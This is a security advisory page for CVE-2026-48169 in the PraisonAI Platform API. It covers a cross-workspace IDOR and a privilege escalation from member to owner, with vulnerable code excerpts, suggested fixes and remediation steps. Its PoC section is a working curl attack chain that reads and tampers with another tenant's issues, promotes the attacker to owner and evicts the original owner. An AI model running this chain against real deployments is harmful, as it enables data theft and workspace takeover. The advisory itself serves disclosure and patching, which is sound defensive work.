Skip to main content

PraisonAI Platform CVE-2026-48169

HIGH
Authorization Bypass Through User-Controlled Key (CWE-639)
2026-05-29 https://github.com/MervinPraison/PraisonAI GHSA-gv23-xrm3-8c62
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 29, 2026 - 23:22 vuln.today
Analysis Generated
May 29, 2026 - 23:22 vuln.today

DescriptionGitHub Advisory

Summary

The PraisonAI Platform API has two authorization failures that together break workspace isolation. The service layer for issues and projects performs global primary-key lookups without checking workspace ownership, so any authenticated user can read, modify, and delete resources in any workspace just by swapping UUIDs in their API requests. On top of that, every member management endpoint (add, update role, remove) only requires min_role="member", which lets any workspace member promote themselves to owner and kick out the original owner. A low-privilege member of one workspace can steal data from every other workspace and take over any workspace they belong to.

Both issues come from the same gap: the route layer pulls workspace_id from the URL and verifies membership, but the service layer ignores the workspace scope for resource lookups and ignores the caller's role level for member operations. The require_workspace_member() dependency does its job correctly. The problem is that the service layer doesn't use the information it provides.

Details

Part 1: Cross-Workspace IDOR (Issues and Projects)

Vulnerable Files:

  • praisonai_platform/services/issue_service.py
  • praisonai_platform/services/project_service.py
  • praisonai_platform/api/routes/issues.py
  • praisonai_platform/api/routes/projects.py

There is a consistent split between the route layer and the service layer. Routes pull workspace_id from the URL and verify membership:

GET /api/v1/workspaces/{workspace_id}/issues/{issue_id}
                        ^^^^^^^^^^^^^^
                        require_workspace_member() checks this

But the service methods these routes call perform global lookups that ignore workspace_id entirely:

IssueService.get(), line 72:

python
async def get(self, issue_id: str) -> Optional[Issue]:
    """Get issue by ID."""
    return await self._session.get(Issue, issue_id)

ProjectService.get(), line 47:

python
async def get(self, project_id: str) -> Optional[Project]:
    """Get project by ID."""
    return await self._session.get(Project, project_id)

Both use session.get(Model, pk), which is a global lookup by primary key with no WHERE workspace_id = ? filter.

Compare that with the properly scoped list_for_workspace() methods in the same files:

IssueService.list_for_workspace(), line 76:

python
async def list_for_workspace(self, workspace_id: str, ...) -> list[Issue]:
    stmt = select(Issue).where(Issue.workspace_id == workspace_id)
# ... properly scoped

The listing is scoped correctly. The get, update, and delete methods are not. Since update() and delete() in both services call self.get() internally, the workspace bypass cascades through all write operations too.

Route that discards workspace_id, issues.py line 82:

python
@router.get("/{issue_id}", response_model=IssueResponse)
async def get_issue(
    workspace_id: str,
# Extracted from URL
    issue_id: str,
    user: AuthIdentity = Depends(require_workspace_member),
# Membership verified
    session: AsyncSession = Depends(get_db),
):
    svc = IssueService(session)
    issue = await svc.get(issue_id)
# workspace_id never passed to service

All affected operations:

ServiceMethodLineWorkspace scoped?
IssueServiceget()72No, uses session.get(Issue, issue_id)
IssueServiceupdate()97No, calls self.get(issue_id)
IssueServicedelete()150No, calls self.get(issue_id)
IssueServicelist_for_workspace()76Yes, filters by workspace_id
ProjectServiceget()47No, uses session.get(Project, project_id)
ProjectServiceupdate()62No, calls self.get(project_id)
ProjectServicedelete()88No, calls self.get(project_id)
ProjectServiceget_stats()97No, only filters by project_id
ProjectServicelist_for_workspace()51Yes, filters by workspace_id
Part 2: Workspace Takeover via Missing Role Enforcement

Vulnerable Files:

  • praisonai_platform/api/routes/workspaces.py (member management routes)
  • praisonai_platform/api/deps.py (authorization dependency)
  • praisonai_platform/services/member_service.py (role hierarchy implementation)

The authorization dependency supports role-based access:

require_workspace_member(), deps.py line 54:

python
async def require_workspace_member(
    workspace_id: str,
    user: AuthIdentity = Depends(get_current_user),
    session: AsyncSession = Depends(get_db),
    min_role: str = "member",
# Accepts higher roles, but nobody passes them
) -> AuthIdentity:
    member_svc = MemberService(session)
    has = await member_svc.has_role(workspace_id, user.id, min_role)
    if not has:
        raise HTTPException(status_code=403, ...)

The has_role() method correctly implements role hierarchy:

MemberService.has_role(), member_service.py line 80:

python
async def has_role(self, workspace_id, user_id, required_role) -> bool:
    """Role hierarchy: owner > admin > member."""
    member = await self.get(workspace_id, user_id)
    if member is None:
        return False
    role_levels = {"owner": 3, "admin": 2, "member": 1}
    user_level = role_levels.get(member.role, 0)
    required_level = role_levels.get(required_role, 0)
    return user_level >= required_level

This works correctly, but no route ever calls require_workspace_member with min_role="owner" or min_role="admin". Every member management route uses the default "member":

Self-promotion, workspaces.py line 115:

python
@router.patch("/{workspace_id}/members/{user_id}", response_model=MemberResponse)
async def update_member_role(
    workspace_id: str,
    user_id: str,
    body: MemberUpdate,
    user: AuthIdentity = Depends(require_workspace_member),
# min_role="member"
    session: AsyncSession = Depends(get_db),
):
    member_svc = MemberService(session)
    member = await member_svc.update_role(workspace_id, user_id, body.role)
# No check: is user modifying their own role? (self-promotion)
# No check: is body.role > caller's current role? (escalation)
# No check: is target a higher role than caller? (modifying superiors)

Owner removal, workspaces.py line 130:

python
@router.delete("/{workspace_id}/members/{user_id}", status_code=204)
async def remove_member(
    workspace_id: str,
    user_id: str,
    user: AuthIdentity = Depends(require_workspace_member),
# min_role="member"
    ...
):
    member_svc = MemberService(session)
    removed = await member_svc.remove(workspace_id, user_id)
# No check: is target a higher role than caller?
# No check: is this the last owner?

Three checks are missing from update_member_role: self-modification, upward escalation, and modifying superiors. Two checks are missing from remove_member: role hierarchy and last-owner protection.

PoC

Prerequisites:

  • A running PraisonAI Platform instance with default configuration
  • No special configuration required

Server setup:

bash
cd /path/to/PraisonAI
pip install -e "src/praisonai-platform"
python -m uvicorn praisonai_platform.api.app:create_app \
  --factory --host 127.0.0.1 --port 8000
Scenario: Full attack chain (IDOR + Privilege Escalation)

Step 1: Victim (CEO) creates workspace with sensitive data

bash
BASE="http://127.0.0.1:8000/api/v1"
# Register CEO
VICTIM=$(curl -sfL -X POST "$BASE/auth/register" \
  -H "Content-Type: application/json" \
  -d '{"email":"ceo@targetcorp.com","password":"Secure123!","name":"CEO"}')
VICTIM_TOKEN=$(echo "$VICTIM" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")
VICTIM_ID=$(echo "$VICTIM" | python3 -c "import sys,json; print(json.load(sys.stdin)['user']['id'])")
# CEO creates workspace with confidential issue
VICTIM_WS=$(curl -sfL -X POST "$BASE/workspaces/" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $VICTIM_TOKEN" \
  -d '{"name":"Executive Board"}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")

ISSUE_ID=$(curl -sfL -X POST "$BASE/workspaces/$VICTIM_WS/issues/" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $VICTIM_TOKEN" \
  -d '{"title":"M&A Target List","description":"Acquiring CompanyX for $2B. Board approved. Do not disclose."}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")
echo "Victim workspace: $VICTIM_WS"
echo "Secret issue: $ISSUE_ID"

Step 2: Attacker registers and creates their own workspace

bash
ATTACKER=$(curl -sfL -X POST "$BASE/auth/register" \
  -H "Content-Type: application/json" \
  -d '{"email":"attacker@evil.com","password":"Evil123!","name":"Attacker"}')
ATK_TOKEN=$(echo "$ATTACKER" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")
ATK_ID=$(echo "$ATTACKER" | python3 -c "import sys,json; print(json.load(sys.stdin)['user']['id'])")

ATK_WS=$(curl -sfL -X POST "$BASE/workspaces/" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $ATK_TOKEN" \
  -d '{"name":"Attacker WS"}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")

Step 3: IDOR - Attacker reads victim's confidential issue through their own workspace

bash
curl -sfL "$BASE/workspaces/$ATK_WS/issues/$ISSUE_ID" \
  -H "Authorization: Bearer $ATK_TOKEN"

Observed output (HTTP 200):

json
{
  "id": "<ISSUE_ID>",
  "workspace_id": "<VICTIM_WS>",
  "title": "M&A Target List",
  "description": "Acquiring CompanyX for $2B. Board approved. Do not disclose.",
  "status": "backlog"
}

The response contains the victim's workspace_id, which is different from the workspace in the request URL. The request was scoped to $ATK_WS but returned data from $VICTIM_WS.

Step 4: IDOR - Attacker modifies victim's issue

bash
curl -sfL -X PATCH "$BASE/workspaces/$ATK_WS/issues/$ISSUE_ID" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $ATK_TOKEN" \
  -d '{"title":"TAMPERED - M&A Target List"}'

Observed output (HTTP 200): Title updated across workspace boundary.

Step 5: Privilege escalation - CEO adds attacker as member (simulating invite)

bash
curl -sfL -X POST "$BASE/workspaces/$VICTIM_WS/members/" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $VICTIM_TOKEN" \
  -d "{\"user_id\":\"$ATK_ID\",\"role\":\"member\"}" > /dev/null

Step 6: Privilege escalation - Member promotes self to owner

bash
PROMO=$(curl -sfL -X PATCH "$BASE/workspaces/$VICTIM_WS/members/$ATK_ID" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $ATK_TOKEN" \
  -d '{"role":"owner"}')
echo "$PROMO" | python3 -c "import sys,json; d=json.load(sys.stdin); print(f'Role: {d[\"role\"]}')"

Observed output:

Role: owner

The member used their own member-level token to promote themselves to owner.

Step 7: Privilege escalation - Attacker removes original owner

bash
curl -sLo /dev/null -w "HTTP %{http_code}" -X DELETE \
  "$BASE/workspaces/$VICTIM_WS/members/$VICTIM_ID" \
  -H "Authorization: Bearer $ATK_TOKEN"

Observed output: HTTP 204 - CEO removed from their own workspace.

Step 8: Verify - Attacker is sole owner

bash
curl -sfL "$BASE/workspaces/$VICTIM_WS/members/" \
  -H "Authorization: Bearer $ATK_TOKEN"

Observed output:

json
[
  {
    "workspace_id": "<VICTIM_WS>",
    "user_id": "<ATK_ID>",
    "role": "owner"
  }
]

The CEO is locked out. The attacker is now the sole owner of "Executive Board" and all its data.

Impact

  • Complete multi-tenant data breach: Any authenticated user can read every issue and project across all workspaces by substituting resource UUIDs. The URL structure (/workspaces/{workspace_id}/...) implies tenant isolation but provides none.
  • Cross-workspace data tampering: An attacker can modify issue titles, descriptions, statuses, assignments, and project fields across workspace boundaries.
  • Cross-workspace data deletion: An attacker can delete issues and projects belonging to other workspaces.
  • Workspace takeover from member role: Any member can self-promote to owner and remove all other owners, gaining sole control of the workspace and everything in it.
  • No recovery mechanism: After takeover, the original owner cannot access or recover their workspace. There is no super-admin role, no audit-based rollback, and no last-owner protection.
  • Chain amplifies impact: The IDOR does not require membership in the target workspace, only membership in any workspace. The privilege escalation turns that foothold into full ownership. Together, a user with a single member-level invite to any workspace can read all data platform-wide and take ownership of any workspace they are invited to.

---

Suggested Fix

1. Scope all service get/update/delete methods to workspace_id

python
# issue_service.py, replace get() at line 72:
async def get(self, issue_id: str, workspace_id: str) -> Optional[Issue]:
    """Get issue by ID, scoped to workspace."""
    issue = await self._session.get(Issue, issue_id)
    if issue is None or issue.workspace_id != workspace_id:
        return None
    return issue
# Apply the same pattern to update(), delete(), and all ProjectService methods

2. Pass workspace_id from routes to services

python
# issues.py, fix get_issue at line 82:
issue = await svc.get(issue_id, workspace_id)
# Now workspace-scoped

3. Require owner role for member management and add escalation guards

python
# workspaces.py, fix update_member_role:
user: AuthIdentity = Depends(
    lambda **kw: require_workspace_member(**kw, min_role="owner")
)
# Add self-modification and last-owner guards:
if user_id == user.id:
    raise HTTPException(403, "Cannot change your own role")
# Fix remove_member:
target = await member_svc.get(workspace_id, user_id)
if target and target.role == "owner":
    owners = [m for m in await member_svc.list_members(workspace_id) if m.role == "owner"]
    if len(owners) <= 1:
        raise HTTPException(403, "Cannot remove the last owner")

AnalysisAI

Cross-workspace IDOR and member-to-owner privilege escalation in PraisonAI Platform API (pip package praisonai-platform <= 0.1.2) lets any authenticated user read, modify, and delete issues and projects belonging to other tenants, and lets any workspace member promote themselves to owner and evict the legitimate owner. The two flaws chain together: a single member-level invite to any workspace becomes platform-wide data access plus full takeover of any workspace the attacker is added to. No public exploit identified at time of analysis beyond the detailed PoC published in the GHSA advisory, and the issue is not in CISA KEV.

Technical ContextAI

PraisonAI Platform is a Python/FastAPI multi-tenant SaaS-style backend (CPE pkg:pip/praisonai-platform) where tenancy is enforced at the route layer through a require_workspace_member dependency that extracts workspace_id from the URL and verifies membership. The root cause is CWE-639 (Authorization Bypass Through User-Controlled Key): IssueService.get/update/delete and ProjectService.get/update/delete/get_stats call SQLAlchemy session.get(Model, pk), a global primary-key lookup with no WHERE workspace_id filter, so the workspace path parameter is decorative. Compounding this, the same require_workspace_member dependency exposes a min_role parameter with a working owner > admin > member hierarchy in MemberService.has_role, but every member-management route in workspaces.py uses the default min_role="member" and omits self-modification, upward-escalation, modifying-superiors, and last-owner guards.

RemediationAI

Vendor-released patch: upgrade praisonai-platform to 0.1.4 or later (pip install -U praisonai-platform>=0.1.4), per the GHSA advisory at https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-gv23-xrm3-8c62. If immediate upgrade is not possible, apply the maintainer-suggested code fixes locally: scope IssueService and ProjectService get/update/delete to workspace_id by adding an issue.workspace_id != workspace_id check after session.get, pass workspace_id from the routes into those service calls, and change the member-management routes in workspaces.py to depend on require_workspace_member with min_role="owner" plus explicit self-modification and last-owner guards. As a compensating control until patched, restrict the API to trusted internal users only (network ACL or auth proxy in front of /api/v1), disable open user registration on /auth/register, and freeze workspace invitations so no new low-privilege members can be added - the trade-off is loss of self-service onboarding and any legitimate cross-tenant collaboration. Audit existing issues, projects, and workspace membership/role rows for unexpected modifications before re-opening access.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-48169 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy